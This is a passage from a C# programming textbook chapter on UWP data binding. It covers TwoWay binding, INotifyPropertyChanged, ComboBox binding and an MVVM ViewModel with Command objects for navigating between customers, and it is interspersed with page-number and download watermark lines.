<TextBox Grid.Row="3" Grid.Column="3" Grid.ColumnSpan="5"
x:Name="email" ... Text="{Binding EmailAddress}" .../>
...
<TextBox Grid.Row="5" Grid.Column="3" Grid.ColumnSpan="3"
x:Name="phone" ... Text="{Binding Phone}" .../>
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Collapsed">
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" ...
Text="{Binding CustomerID}" .../>
...
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
...
Text="{Binding FirstName}" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName" ...
Text="{Binding LastName}" .../>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail" ...
Text="{Binding EmailAddress}" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone" ...
Text="{Binding Phone}" .../>
</Grid>
Notice how the same binding expression can be used with more than one
control. For example, the expression {Binding CustomerID} is
referenced by the id and cId TextBox controls, which causes both
controls to display the same data.
9. In Solution Explorer, expand the MainPage.xaml file, and then double-
click the MainPage.xaml.cs file to display the code for the
MainPage.xaml form in the Code and Text Editor window. Add the
statement shown below in bold to the MainPage constructor.
Click here to view code image
public MainPage()
{
this.InitializeComponent();
Customer customer = new Customer
{
CustomerID = 1,
Title = "Mr",
FirstName = "John",
Download from finelybook [email protected]
957
LastName = "Sharp",
EmailAddress = "[email protected]",
Phone = "111-1111"
};
}
This code creates a new instance of the Customer class and populates it
with some sample data.
10. After the code that creates the new Customer object, add the following
statement shown in bold:
Click here to view code image
Customer customer = new Customer
{
...
};
this.DataContext = customer;
This statement specifies the object to which controls on the MainPage
form should bind. In each of the controls, the XAML markup
Text=”{Binding Path}” will be resolved against this object. For
example, the id TextBox and cId TextBox controls both specify
Text=”{Binding CustomerID}”, so they will display the value found in
the CustomerID property of the Customer object to which the form is
bound.
Note In this example, you have set the DataContext property of the
form, so the same data binding automatically applies to all the
controls on the form. You can also set the DataContext property
for individual controls if you need to bind specific controls to
different objects.
11. On the Debug menu, click Start Debugging to build and run the app.
Verify that the form occupies the full screen and displays the details for
the customer John Sharp, as shown in the following image:
Download from finelybook [email protected]
958
12. Resize the app window to display it in the narrow view. Verify that it
displays the same data, as illustrated here:
Download from finelybook [email protected]
959
The controls displayed in the narrow view are bound to the same data as
the controls displayed in the full-screen view.
13. In the narrow view, change the email address to
[email protected].
14. Expand the app window to switch to the wide view.
Notice that the email address displayed in this view has not changed.
15. Return to Visual Studio and stop debugging.
Download from finelybook [email protected]
960
16. In Visual Studio, display the code for the Customer class in the Code
and Text Editor window and set a breakpoint in the set property accessor
for the EmailAddress property.
17. On the Debug menu, click Start Debugging to build and run the
application again.
18. When the debugger reaches the breakpoint for the first time, press F5 to
continue running the app.
19. When the UI for the Customers app appears, resize the application
window to display the narrow view and change the email address to
[email protected].
20. Expand the app window back to the wide view.
Notice that the debugger does not reach the breakpoint in the set
accessor for the EmailAddress property; the updated value is not written
back to the Customer object when the email TextBox loses the focus.
21. Return to Visual Studio and stop debugging.
22. Remove the breakpoint in the set accessor of the EmailAddress property
in the Customer class.
Modifying data by using data binding
In the previous exercise, you saw how easily data in an object could be
displayed by using data binding. However, data binding is a one-way
operation by default, and any changes you make to the displayed data are not
copied back to the data source. In the exercise, you saw this when you
changed the email address displayed in the narrow view; when you switched
back to the wide view, the data had not changed. You can implement
bidirectional data binding by modifying the Mode parameter of the Binding
specification in the XAML markup for a control. The Mode parameter
indicates whether data binding is one-way or two-way. This is what you will
do next.
Implement TwoWay data binding to modify customer information
1. Display the MainPage.xaml file in the Design View window and modify
Download from finelybook [email protected]
961
the XAML markup for each of the TextBox controls as shown in bold in
the following code:
Click here to view code image
<Grid x:Name="customersTabularView" ...>
...
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id" ...
Text="{Binding CustomerID, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName" ...
Text="{Binding FirstName, Mode=TwoWay}" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName" ...
Text="{Binding LastName, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="3" Grid.Column="3" Grid.ColumnSpan="5"
x:Name="email" ... Text="{Binding EmailAddress, Mode=TwoWay}"
.../>
...
<TextBox Grid.Row="5" Grid.Column="3" Grid.ColumnSpan="3"
x:Name="phone" ... Text="{Binding Phone, Mode=TwoWay}" ..."/>
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20" ...>
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" ...
Text="{Binding CustomerID, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
...
Text="{Binding FirstName, Mode=TwoWay}" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName" ...
Text="{Binding LastName, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail" ...
Text="{Binding EmailAddress, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone" ...
Text="{Binding Phone, Mode=TwoWay}" .../>
</Grid>
The Mode parameter to the Binding specification indicates whether data
binding is one-way (the default) or two-way. Setting Mode to TwoWay
causes any changes made by the user to be passed back to the object to
which a control is bound.
2. On the Debug menu, click Start Debugging to build and run the app
again.
3. With the app in the wide view, change the email address to
Download from finelybook [email protected]
962
[email protected], and then resize the window to display the app
in the narrow view.
Notice that despite the change in the data binding to TwoWay mode, the
email address displayed in the narrow view has not been updated; it is
still [email protected].
4. Return to Visual Studio and stop debugging.
Clearly, something is not working correctly! The problem now is not that
the data has not been updated but rather that the view is not displaying the
latest version of the data. (If you reinstate the breakpoint in the set accessor
for the EmailAddress property of the Customer class and run the app in the
debugger, you will see the debugger reach the breakpoint whenever you
change the value of the email address and move the focus away from the
TextBox control.) Despite appearances, the data-binding process is not magic,
and a data binding does not know when the data to which it is bound has been
changed. The object needs to inform the data binding of any modifications by
sending a PropertyChanged event to the UI. This event is part of an interface
named INotifyPropertyChanged, and all objects that support two-way data
binding should implement this interface. You will implement this interface in
the next exercise.
Implement the INotifyPropertyChanged interface in the Customer class
1. In Visual Studio, display the Customer.cs file in the Code and Text
Editor window.
2. Add the following using directive to the list at the top of the file:
using System.ComponentModel;
The INotifyPropertyChanged interface is defined in this namespace.
3. Modify the definition of the Customer class to specify that it implements
the INotifyPropertyChanged interface, as shown here in bold:
Click here to view code image
public class Customer : INotifyPropertyChanged
{
...
}
Download from finelybook [email protected]
963
4. After the Phone property at the end of the Customer class, add the
PropertyChanged event shown in bold in the following code:
Click here to view code image
public class Customer : INotifyPropertyChanged
{
...
public string _phone;
public string Phone {
get => this._phone;
set { this._phone = value; }
}
public event PropertyChangedEventHandler PropertyChanged;
}
This event is the only item that the INotifyPropertyChanged interface
defines. All objects that implement this interface must provide this
event, and they should raise this event whenever they want to notify the
outside world of a change to a property value.
5. Add the OnPropertyChanged method shown below in bold to the
Customer class, after the PropertyChanged event:
Click here to view code image
class Customer : INotifyPropertyChanged
{
...
public event PropertyChangedEventHandler PropertyChanged;
protected virtual void OnPropertyChanged(string
propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged(this,
new PropertyChangedEventArgs(propertyName));
}
}
}
The OnPropertyChanged method raises the PropertyChanged event.
The PropertyChangedEventArgs parameter to the PropertyChanged
event should specify the name of the property that has changed. This
value is passed in as a parameter to the OnPropertyChanged method.
Download from finelybook [email protected]
964
Note You can reduce the code in the OnPropertyChanged method
to a single statement, using the null conditional operator (?.) and
the Invoke method, like this:
Click here to view code image
PropertyChanged?.Invoke(this,
new PropertyChangedEventArgs(propertyName));
However, my personal preference is to prefer readability over
terse code; it makes it easier to maintain your applications.
6. Modify the property set accessors for each of the properties in the
Customer class to call the OnPropertyChanged method whenever the
value that they contain is modified, as shown in bold here:
Click here to view code image
public class Customer : INotifyPropertyChanged
{
public int _customerID;
public int CustomerID
{
get => this._customerID;
set
{
this._customerID = value;
this.OnPropertyChanged(nameof(CustomerID));
}
}
public string _title;
public string Title
{
get => this._title;
set
{
this._title = value;
this.OnPropertyChanged(nameof(Title));
}
}
public string _firstName;
Download from finelybook [email protected]
965
public string FirstName
{
get => this._firstName;
set
{
this._firstName = value;
this.OnPropertyChanged(nameof(FirstName));
}
}
public string _lastName;
public string LastName
{
get => this._lastName;
set
{
this._lastName = value;
this.OnPropertyChanged(nameof(LastName));
}
}
public string _emailAddress;
public string EmailAddress
{
get => this._emailAddress;
set
{
this._emailAddress = value;
this.OnPropertyChanged(nameof(EmailAddress));
}
}
public string _phone;
public string Phone
{
get => this._phone;
set
{
this._phone = value;
this.OnPropertyChanged(nameof(Phone));
}
}
...
}
The nameof operator
The nameof operator demonstrated in the Customer class is a little-
Download from finelybook [email protected]
966
used but highly useful feature of C# in code such as this. It returns
the name of the variable passed in as its parameter as a string.
Without using the nameof operator, you would have had to use
hard-coded string values. For example:
Click here to view code image
public int CustomerID
{
get { return this._customerID; }
set
{
this._customerID = value;
this.OnPropertyChanged("CustomerID");
}
}
Although using the string values requires less typing, consider
what would happen if you needed to change the name of the
property at some point in the future. Using the string approach, you
would need to modify the string value as well. If you didn’t, the
code would still compile and run, but any changes made to the
property value at run time would not be notified, leading to
difficult-to-find bugs. Using the nameof operator, if you change the
name of the property but forget to change the argument to nameof,
the code will not compile, alerting you immediately to an error that
should be quick and easy to fix.
7. On the Debug menu, click Start Debugging to build and run the app
again.
8. When the Customers form appears, change the email address to
[email protected], and change the phone number to 222-2222.
9. Resize the window to display the app in the narrow view and verify that
the email address and phone number have changed.
10. Change the first name to James, expand the window to display the wide
view, and verify that the first name has changed.
11. Return to Visual Studio and stop debugging.
Download from finelybook [email protected]
967
Using data binding with a ComboBox control
Using data binding with a control such as a TextBox or TextBlock is a
relatively straightforward matter. On the other hand, ComboBox controls
require a little more attention. The issue is that a ComboBox control actually
displays two things:
A list of values in the drop-down list from which the user can select an
item
The value of the currently selected item.
If you implement data binding to display a list of items in the drop-down
list of a ComboBox control, the value that the user selects must be a member
of this list. In the Customers app, you can configure data binding for the
selected value in the title ComboBox control by setting the SelectedValue
property, like this:
Click here to view code image
<ComboBox ... x:Name="title" ... SelectedValue="{Binding Title}" ...
/>
However, remember that the list of values for the drop-down list is hard-
coded into the XAML markup, like this:
Click here to view code image
<ComboBox ... x:Name="title" ... >
<ComboBoxItem Content="Mr"/>
<ComboBoxItem Content="Mrs"/>
<ComboBoxItem Content="Ms"/>
<ComboBoxItem Content="Miss"/>
</ComboBox>
This markup is not applied until the control has been created, so the value
specified by the data binding is not found in the list because the list does not
yet exist when the data binding is constructed. The result is that the value is
not displayed. You can try this if you like—configure the binding for the
SelectedValue property as just shown and run the app. The title ComboBox
will be empty when it is initially displayed, despite the fact that the customer
has the title of Mr.
There are several solutions to this problem, but the simplest is to create a
data source that contains the list of valid values and then specify that the
Download from finelybook [email protected]
968
ComboBox control should use this list as its set of values for the drop-down.
Also, you need to do this before the data binding for the ComboBox is
applied.
Implement data binding for the title ComboBox controls
1. In Visual Studio, display the MainPage.xaml.cs file in the Code and
Text Editor window.
2. Add the following code shown in bold to the MainPage constructor:
Click here to view code image
public MainPage()
{
this.InitializeComponent();
List<string> titles = new List<string>
{
"Mr", "Mrs", "Ms", "Miss"
};
this.title.ItemsSource = titles;
this.cTitle.ItemsSource = titles;
Customer customer = new Customer
{
...
};
this.DataContext = customer;
}
This code creates a list of strings containing the valid titles that
customers can have. The code then sets the ItemsSource property of both
title ComboBox controls to reference this list (remember that each view
has a ComboBox control).
Note In a commercial app, you would most likely retrieve the list
of values displayed by a ComboBox control from a database or
some other data source rather than a hard-coded list, as shown in
this example.
Download from finelybook [email protected]
969
The placement of this code is important. It must run before the statement
that sets the DataContext property of the MainPage form because this
statement is when the data binding to the controls on the form occurs.
3. Display the MainPage.xaml file in the Design View window.
4. Modify the XAML markup for the title and cTitle ComboBox controls,
as shown here in bold:
Click here to view code image
<Grid x:Name="customersTabularView" ...>
...
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title" ...
SelectedValue="{Binding Title, Mode=TwoWay}">
</ComboBox>
...
</Grid>
<Grid x:Name="customersColumnarView" ...>
...
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle" ...
SelectedValue="{Binding Title, Mode=TwoWay}">
</ComboBox>
...
</Grid>
Notice that the list of ComboBoxItem elements for each control has been
removed and that the SelectedValue property is configured to use data
binding with the Title field in the Customer object.
5. On the Debug menu, click Start Debugging to build and run the
application.
6. Verify that the value of the customer’s title is displayed correctly (it
should be Mr). Click the drop-down arrow for the ComboBox control
and verify that it contains the values Mr, Mrs, Ms, and Miss.
7. Resize the window to display the app in the narrow view and perform
the same checks. Note that you can change the title, and when you
switch back to the wide view, the new title is displayed.
8. Return to Visual Studio and stop debugging.
Creating a ViewModel
Download from finelybook [email protected]
970
You have now seen how to configure data binding to connect a data source to
the controls in a user interface, but the data source that you have been using
is very simple, consisting of a single customer. In the real world, the data
source is likely to be much more complex, comprising collections of different
types of objects. Remember that in MVVM terms, the data source is often
provided by the model, and the UI (the view) communicates with the model
only indirectly through a ViewModel object. The rationale behind this
approach is that the model and the views that display the data provided by the
model should be independent; you should not have to change the model if the
user interface is modified, nor should you be required to adjust the UI if the
underlying model changes.
The ViewModel provides the connection between the view and the model,
and it also implements the business logic for the app. Again, this business
logic should be independent of the view and the model. The ViewModel
exposes the business logic to the view by implementing a collection of
commands. The UI can trigger these commands based on the way in which
the user navigates through the app. In the following exercise, you will extend
the Customers app by implementing a model that contains a list of Customer
objects and creating a ViewModel that provides commands with which a user
can move between customers in the view.
Create a ViewModel for managing customer information
1. Open the Customers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 26\ ViewModel folder in your Documents folder.
This project contains a completed version of the Customers app from the
previous set of exercises; if you prefer, you can continue to use your
own version of the project.
2. In Solution Explorer, right-click the Customers project, point to Add,
and then click Class.
3. In the Add New Items - Customers dialog box, in the Name box, type
ViewModel.cs, and then click Add.
You will use this class to provide a basic ViewModel that contains a
collection of Customer objects. The user interface will bind to the data
exposed by this ViewModel.
Download from finelybook [email protected]
971
4. In the Code and Text Editor window displaying the ViewModel.cs file,
mark the class as public and add the code shown in bold in the following
example to the ViewModel class:
Click here to view code image
public class ViewModel
{
private List<Customer> customers;
public ViewModel()
{
this.customers = new List<Customer>
{
new Customer
{
CustomerID = 1,
Title = "Mr",
FirstName="John",
LastName="Sharp",
EmailAddress="[email protected]",
Phone="111-1111"
},
new Customer
{
CustomerID = 2,
Title = "Mrs",
FirstName="Diana",
LastName="Sharp",
EmailAddress="[email protected]",
Phone="111-1112"
},
new Customer
{
CustomerID = 3,
Title = "Ms",
FirstName="Francesca",
LastName="Sharp",
EmailAddress="[email protected]",
Phone="111-1113"
}
};
}
}
The ViewModel class uses a List<Customer> object as its model, and
the constructor populates this list with some sample data. Strictly
speaking, this data should be held in a separate Model class, but for the
purposes of this exercise we will make do with this sample data.
Download from finelybook [email protected]
972
5. Add the private variable currentCustomer shown in bold in the
following code to the ViewModel class, and initialize this variable to
zero in the constructor:
Click here to view code image
class ViewModel
{
private List<Customer> customers;
private int currentCustomer;
public ViewModel()
{
this.currentCustomer = 0;
this.customers = new List<Customer>
{
...
}
}
}
The ViewModel class will use this variable to track which Customer
object the view is currently displaying.
6. Add the Current property shown below in bold to the ViewModel class,
after the constructor:
Click here to view code image
class ViewModel
{
...
public ViewModel()
{
...
}
public Customer Current
{
get => this.customers.Count > 0 ?
this.customers[currentCustomer] : null;
}
}
The Current property provides access to the current Customer object in
the model. If there are no customers, it returns a null object.
Download from finelybook [email protected]
973
Note It is good practice to provide controlled access to a data
model; only the ViewModel should be able to modify the model.
However, this restriction does not prevent the view from being
able to update the data presented by the ViewMode; it just cannot
switch the model and make it refer to a different data source.
7. Open the MainPage.xaml.cs file in the Code and Text Editor window.
8. In the MainPage constructor, remove the code that creates the Customer
object and replace it with a statement that creates an instance of the
ViewModel class. Change the statement that sets the DataContext
property of the MainPage object to reference the new ViewModel object,
as shown here in bold:
Click here to view code image
public MainPage()
{
...
this.cTitle.ItemsSource = titles;
ViewModel viewModel = new ViewModel();
this.DataContext = viewModel;
}
9. Open the MainPage.xaml file in the Design View window.
10. In the XAML pane, modify the data bindings for the TextBox and
ComboBox controls to reference properties through the Current object
presented by the ViewModel, as shown in bold in the following code:
Click here to view code image
<Grid x:Name="customersTabularView" ...>
...
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id" ...
Text="{Binding Current.CustomerID, Mode=TwoWay}" .../>
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName" ...
Text="{Binding Current.FirstName, Mode=TwoWay }" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName" ...
Text="{Binding Current.LastName, Mode=TwoWay }" .../>
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title" ...
Download from finelybook [email protected]
974
SelectedValue="{Binding Current.Title, Mode=TwoWay}">
</ComboBox>
...
<TextBox Grid.Row="3" Grid.Column="3" ... x:Name="email" ...
Text="{Binding Current.EmailAddress, Mode=TwoWay }" .../>
...
<TextBox Grid.Row="5" Grid.Column="3" ... x:Name="phone" ...
Text="{Binding Current.Phone, Mode=TwoWay }" .../>
</Grid>
<Grid x:Name="customersColumnarView" Margin="20,10,20,110" ...>
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" ...
Text="{Binding Current.CustomerID, Mode=TwoWay }" .../>
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
...
Text="{Binding Current.FirstName, Mode=TwoWay }" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName" ...
Text="{Binding Current.LastName, Mode=TwoWay }" .../>
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle" ...
SelectedValue="{Binding Current.Title, Mode=TwoWay}">
</ComboBox>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail" ...
Text="{Binding Current.EmailAddress, Mode=TwoWay }" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone" ...
Text="{Binding Current.Phone, Mode=TwoWay }" .../>
</Grid>
11. On the Debug menu, click Start Debugging to build and run the app.
12. Verify that the app displays the details of John Sharp (the first customer
in the customers list). Change the details of the customer and switch
between views to prove that the data binding is still functioning
correctly.
13. Return to Visual Studio and stop debugging.
The ViewModel provides access to customer information through the
Current property, but currently, it does not supply a way to navigate between
customers. You can implement methods that increment and decrement the
currentCustomer variable so that the Current property retrieves different
customers, but you should do so in a manner that does not tie the view to the
ViewModel. The most commonly accepted technique is to use the Command
pattern. In this pattern, the ViewModel exposes methods in the form of
commands that the view can invoke. The trick is to avoid explicitly
referencing these methods by name in the code for the view. To do this,
Download from finelybook [email protected]
975
XAML makes it possible for you to declaratively bind commands to the
actions triggered by controls in the UI, as you will see in the exercises in the
next section.
Adding commands to a ViewModel
The XAML markup that binds the action of a control to a command requires
that commands exposed by a ViewModel implement the ICommand
interface. This interface defines the following items:
CanExecute This method returns a Boolean value indicating whether
the command can run. Using this method, a ViewModel can enable or
disable a command depending on the context. For example, a
command that fetches the next customer from a list should be able to
run only if there is a next customer to fetch; if there are no more
customers, the command should be disabled.
Execute This method runs when the command is invoked.
CanExecuteChanged This event is triggered when the state of the
ViewModel changes. Under these circumstances, commands that could
previously run might now be disabled and vice versa. For example, if
the UI invokes a command that fetches the next customer from a list, if
that customer is the last customer, then subsequent calls to CanExecute
should return false. In these circumstances, the CanExecuteChanged
event should fire to indicate that the command has been disabled.
In the next exercise, you will create a generic class that implements the
ICommand interface.
Implement the Command class
1. In Visual Studio, right-click the Customers project, point to Add, and
then click Class.
2. In the Add New Item - Customers dialog box, select the Class template.
In the Name box, type Command.cs, and then click Add.
3. In the Code and Text Editor window displaying the Command.cs file,
add the following using directive to the list at the top of the file:
using System.Windows.Input;
Download from finelybook [email protected]
976
The ICommand interface is defined in this namespace.
4. Make the Command class public and specify that it implements the
ICommand interface, as follows in bold:
Click here to view code image
public class Command : ICommand
{
}
5. Add the following private fields to the Command class:
Click here to view code image
public class Command : ICommand
{
private Action methodToExecute = null;
private Func<bool> methodToDetectCanExecute = null;
}
The Action and Func types are briefly described in Chapter 20,
“Decoupling application logic and handling events.” The Action type is
a delegate that you can use to reference a method that takes no
parameters and does not return a value, and the Func<T> type is also a
delegate that can reference a method that takes no parameters but returns
a value of the type specified by the type parameter T. In this class, you
will use the methodToExecute field to reference the code that the
Command object will run when it is invoked by the view. The
methodToDetectCanExecute field will be used to reference the method
that detects whether the command can run (it may be disabled for some
reason, depending on the state of the app or the data).
6. Add a constructor to the Command class. This constructor should take
two parameters: an Action object and a Func<T> object. Assign these
parameters to the methodToExecute and methodToDetectCanExecute
fields, as shown here in bold:
Click here to view code image
public Command : ICommand
{
...
public Command(Action methodToExecute, Func<bool>
methodToDetectCanExecute)
{
Download from finelybook [email protected]
977
this.methodToExecute = methodToExecute;
this.methodToDetectCanExecute =
methodToDetectCanExecute;
}
}
The ViewModel will create an instance of this class for each command.
The ViewModel will supply the method to run the command and the
method to detect whether the command should be enabled when it calls
the constructor.
7. Implement the Execute and CanExecute methods of the Command class
by using the methods referenced by the methodToExecute and
methodToDetectCanExecute fields, as follows:
Click here to view code image
public Command : ICommand
{
...
public Command(Action methodToExecute,
Func<bool> methodToDetectCanExecute)
{
...
}
public void Execute(object parameter)
{
this.methodToExecute();
}
public bool CanExecute(object parameter)
{
if (this.methodToDetectCanExecute == null)
{
return true;
}
else
{
return this.methodToDetectCanExecute();
}
}
}
Notice that if the ViewModel provides a null reference for the
methodToDetectCanExecute parameter of the constructor, the default
action is to assume that the command can run, and the CanExecute
method returns true.
Download from finelybook [email protected]
978
8. Add the public CanExecuteChanged event to the Command class:
Click here to view code image
public Command : ICommand
{
...
public bool CanExecute(object parameter)
{
...
}
public event EventHandler CanExecuteChanged;
}
When you bind a command to a control, the control automatically
subscribes to this event. This event should be raised by the Command
object if the state of the ViewModel is updated and the value returned by
the CanExecute method changes. The simplest strategy is to use a timer
to raise the CanExecuteChanged event once a second or so. The control
can then invoke CanExecute to determine whether the command can
still be executed and take steps to enable or disable itself depending on
the result.
9. Add the using directive shown next to the list at the top of the file:
using Windows.UI.Xaml;
10. Add the following field shown in bold to the Command class above the
constructor:
Click here to view code image
public class Command : ICommand
{
...
private Func<bool> methodToDetectCanExecute = null;
private DispatcherTimer canExecuteChangedEventTimer = null;
public Command(Action methodToExecute, Func<bool>
methodToDetectCanExecute)
{
...
}
}
The DispatcherTimer class, defined in the Windows.UI.Xaml
namespace, implements a timer that can raise an event at specified
Download from finelybook [email protected]
979
intervals. You will use the canExecuteChangedEventTimer field to
trigger the CanExecuteChanged event at one-second intervals.
11. Add the canExecuteChangedEventTimer_Tick method shown in bold in
the following code to the end of the Command class:
Click here to view code image
public class Command : ICommand
{
...
public event EventHandler CanExecuteChanged;
void canExecuteChangedEventTimer_Tick(object sender, object
e)
{
if (this.CanExecuteChanged != null)
{
this.CanExecuteChanged(this, EventArgs.Empty);
}
}
}
This method simply raises the CanExecuteChanged event if at least one
control is bound to the command. Strictly speaking, this method should
also check whether the state of the object has changed before raising the
event. However, you will set the timer interval to a lengthy period (in
processing terms) to minimize any inefficiencies in not checking for a
change in state.
12. In the Command constructor, add the following statements shown in
bold.
Click here to view code image
public class Command : ICommand
{
...
public Command(Action methodToExecute, Func<bool>
methodToDetectCanExecute)
{
this.methodToExecute = methodToExecute;
this.methodToDetectCanExecute =
methodToDetectCanExecute;
this.canExecuteChangedEventTimer = new
DispatcherTimer();
this.canExecuteChangedEventTimer.Tick +=
Download from finelybook [email protected]
980
canExecuteChangedEventTimer_Tick;
this.canExecuteChangedEventTimer.Interval = new
TimeSpan(0, 0, 1);
this.canExecuteChangedEventTimer.Start();
}
...
}
This code initiates the DispatcherTimer object and sets the interval for
timer events to one second before it starts the timer running.
13. On the Build menu, click Build Solution and ensure that your app builds
without errors.
You can now use the Command class to add commands to the ViewModel
class. In the next exercise, you will define commands to enable a user to
move between customers in the view.
Add NextCustomer and PreviousCustomer commands to the ViewModel
class
1. In Visual Studio, open the ViewModel.cs file in the Code and Text
Editor window.
2. Add the following using directive to the top of the file and modify the
definition of the ViewModel class to implement the
INotifyPropertyChanged interface.
Click here to view code image
...
using System.ComponentModel;
namespace Customers
{
public class ViewModel : INotifyPropertyChanged
{
...
}
}
3. Add the PropertyChanged event and OnPropertyChanged method to the
end of the ViewModel class. This is the same code that you included in
the Customer class.
Click here to view code image
Download from finelybook [email protected]
981
public class ViewModel : INotifyPropertyChanged
{
...
public event PropertyChangedEventHandler PropertyChanged;
protected virtual void OnPropertyChanged(string
propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged(this,
new PropertyChangedEventArgs(propertyName));
}
}
}
Remember that the view references data through the Current property in
the data-binding expressions for the various controls that it contains.
When the ViewModel class moves to a different customer, it must raise
the PropertyChanged event to notify the view that the data to be
displayed has changed.
4. Add the following fields and properties to the ViewModel class
immediately after the constructor:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
...
public ViewModel()
{
...
}
private bool _isAtStart;
public bool IsAtStart
{
get => this._isAtStart;
set
{
this._isAtStart = value;
this.OnPropertyChanged(nameof(IsAtStart));
}
}
private bool _isAtEnd;
public bool IsAtEnd
{
get => this._isAtEnd;
Download from finelybook [email protected]
982
set
{
this._isAtEnd = value;
this.OnPropertyChanged(nameof(IsAtEnd));
}
}
...
}
You will use these two properties to track the state of the ViewModel.
The IsAtStart property will be set to true when the currentCustomer
field in the ViewModel is positioned at the start of the customers
collection, and the IsAtEnd property will be set to true when the
ViewModel is positioned at the end of the customers collection.
5. Modify the constructor to set the IsAtStart and IsAtEnd properties, as
shown here in bold.:
Click here to view code image
public ViewModel()
{
this.currentCustomer = 0;
this.IsAtStart = true;
this.IsAtEnd = false;
this.customers = new List<Customer>
{
...
};
}
6. After the Current property, add the Next and Previous private methods
shown in bold to the ViewModel class:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
...
public Customer Current
{
...
}
private void Next()
{
if (this.customers.Count - 1 > this.currentCustomer)
{
this.currentCustomer++;
Download from finelybook [email protected]
983
this.OnPropertyChanged(nameof(Current));
this.IsAtStart = false;
this.IsAtEnd = (this.customers.Count - 1 ==
this.currentCustomer);
}
}
private void Previous()
{
if (this.currentCustomer > 0)
{
this.currentCustomer--;
this.OnPropertyChanged(nameof(Current));
this.IsAtEnd = false;
this.IsAtStart = (this.currentCustomer == 0);
}
}
...
}
Note The Count property returns the number of items in a
collection, but remember that the items in a collection are
numbered from 0 to Count - 1.
These methods update the currentCustomer variable to refer to the next
(or previous) customer in the customers list. Notice that these methods
maintain the values for the IsAtStart and IsAtEnd properties and indicate
that the current customer has changed by raising the PropertyChanged
event for the Current property. These methods are private because they
should not be accessible from outside the ViewModel class. External
classes will run these methods by using commands, which you will add
in the following steps.
7. Add the NextCustomer and PreviousCustomer automatic properties to
the ViewModel class, as shown here in bold:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
private List<Customer> customers;
Download from finelybook [email protected]
984
private int currentCustomer;
public Command NextCustomer { get; private set; }
public Command PreviousCustomer { get; private set; }
...
}
The view will bind to these Command objects so that the user can
navigate between customers.
8. In the ViewModel constructor, set the NextCustomer and
PreviousCustomer properties to refer to new Command objects, as
follows:
Click here to view code image
public ViewModel()
{
this.currentCustomer = 0;
this.IsAtStart = true;
this.IsAtEnd = false;
this.NextCustomer = new Command(this.Next, () =>
this.customers.Count > 1 && !this.IsAtEnd);
this.PreviousCustomer = new Command(this.Previous, () =>
this.customers.Count > 0 && !this.IsAtStart);
this.customers = new List<Customer>
{
...
};
}
The NextCustomer Command specifies the Next method as the operation
to perform when the Execute method is invoked. The lambda expression
() => { return this.customers.Count > 1 && !this.IsAtEnd; } is specified
as the function to call when the CanExecute method runs.
This expression returns true as long as the customers list contains more
than one customer and the ViewModel is not positioned on the final
customer in this list. The PreviousCustomer Command follows the same
pattern: it invokes the Previous method to retrieve the previous customer
from the list, and the CanExecute method references the expression ()
=> { return this.customers.Count > 0 && !this.IsAtStart; }, which
returns true as long as the customers list contains at least one customer
and the ViewModel is not positioned on the first customer in this list.
9. On the Build menu, click Build Solution and verify that your app still
Download from finelybook [email protected]
985
builds without errors.
Now that you have added the NextCustomer and PreviousCustomer
commands to the ViewModel, you can bind these commands to buttons in the
view. When the user clicks a button, the appropriate command will run.
Microsoft publishes guidelines for adding buttons to views in UWP apps,
and the general recommendation is that buttons that invoke commands should
be placed on a command bar. UWP apps provide two command bars: one
appears at the top of the form and the other at the bottom. Buttons that
navigate through an app or data are commonly placed on the top command
bar, and this is the approach that you will adopt in the next exercise.
Note You can find the Microsoft guidelines for implementing command
bars at http://msdn.microsoft.com/library/windows/apps/hh465302.aspx.
Add Next and Previous buttons to the Customers form
1. Open the MainPage.xaml file in the Design View window.
2. Scroll to the bottom of the XAML pane and add the following markup
shown in bold, immediately after the final </Grid> tag but before the
closing </Page> tag:
Click here to view code image
...
</Grid>
<Page.TopAppBar>
<CommandBar>
<AppBarButton x:Name="previousCustomer"
Icon="Previous"
Label="Previous" Command="{Binding Path=PreviousCustomer}"/>
<AppBarButton x:Name="nextCustomer" Icon="Next"
Label="Next" Command="{Binding Path=NextCustomer}"/>
</CommandBar>
</Page.TopAppBar>
</Page>
There are several points to notice in this fragment of XAML markup:
Download from finelybook [email protected]
986
By default, the command bar appears at the top of the screen and
displays icons for the buttons that it contains. The label for each
button is displayed only when the user clicks the More (…) button
that appears on the right side of the command bar. However, if
you are designing an application that could be used across
multiple countries or cultures, you should not provide hard-coded
values for labels but instead, store the text for these labels in a
